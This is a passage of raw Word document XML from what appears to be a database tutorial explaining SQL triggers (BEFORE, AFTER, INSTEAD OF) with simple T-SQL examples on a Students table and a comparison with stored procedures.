        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Automating routine tasks, such as data import/export or reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6841194A" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enforcing data integrity and consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24742D96" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Triggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18059715"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 trigger is a special type of stored procedure that automatically executes in response to specific events (INSERT, UPDATE, DELETE) occurring on a table or view. Triggers are used to enforce rules, validate data, and automate actions based on changes to the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2981ADF6"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Key Characteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFB8C15" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Automatic Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Executes automatically in response to data modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4339FA0A" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event-Driven</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Activated by specific events, such as data modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223A2794" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Types</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: There are different types of triggers based on when they are fired (BEFORE, AFTER, INSTEAD OF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0D195B"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Types of Triggers</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D928191" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BEFORE Trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4881526B" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36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Executes before the specified operation (INSERT, UPDATE, DELETE) occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2443BC4C" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="369"/>
        </w:num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 Used to validate or modify data before it is written to the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559B78E3"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A808609"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TRIGGER BeforeInsertStudent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA2DE1D"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ON Students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762FC604"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BEFORE INSERT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CC6C3C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A60F91D"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BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354193AB"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EXISTS (SELECT * FROM inserted WHERE StudentID IS NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCAE190"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BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153C0E02"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RAISERROR ('StudentID cannot be NULL', 16, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF21B26"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ROLLBACK TRANSACTION;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52085207"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END</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243FAC7D"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END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C8F800" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AFTER Trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDEE181" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36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Executes after the specified operation (INSERT, UPDATE, DELETE) has occurred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7DF2F9" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="369"/>
        </w:num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 Used to perform actions such as logging or updating related tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDEFD84"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1E6E8330"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TRIGGER AfterUpdateStudent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AB885B"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ON Students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9ABC37"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AFTER UPDATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E334374"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAF78D4"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BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BB45FD"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INSERT INTO AuditLog (StudentID, ChangeDate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5078E71B"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SELECT StudentID, GETDATE()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4946DBBD"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FROM inserted;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E68AED6"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END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51082507" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>INSTEAD OF Trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40815CDA" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36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Executes in place of the specified operation (INSERT, UPDATE, DELETE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD3F2D5" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="369"/>
        </w:num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 Used to override default behaviors or to perform custom actions instead of the standard operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0717B4D7"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D0AE6E6"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TRIGGER InsteadOfDeleteStudent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2648FC18"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ON Students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FBE5FB"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INSTEAD OF DELETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B2B00A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C185204"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BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0F29E3"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UPDATE Students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC6B96A"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SET IsDeleted = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC3EA14"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WHERE StudentID IN (SELECT StudentID FROM deleted);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF7E18D" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EF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END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C94A15B" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Common Use Cases</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF16AC" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Enforcing business rules and data validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01158CA5" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Automatically updating or maintaining related data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C14659" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Auditing and logging changes to data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB484D9" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Preventing invalid data modifications by implementing custom logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175946DF" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5700A67D" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Execution Timing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFFDC35" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stored Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Explicitly called by users or applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AFAC14" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Triggers</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Automatically executed in response to specific data changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16695868" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627138CA" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stored Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Used for encapsulating complex logic, improving performance, and automating routine tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9C8144" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Triggers</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Used for enforcing rules, automating data modifications, and maintaining data integrity based on changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B17C60E" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Control</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A15AAFA" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stored Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
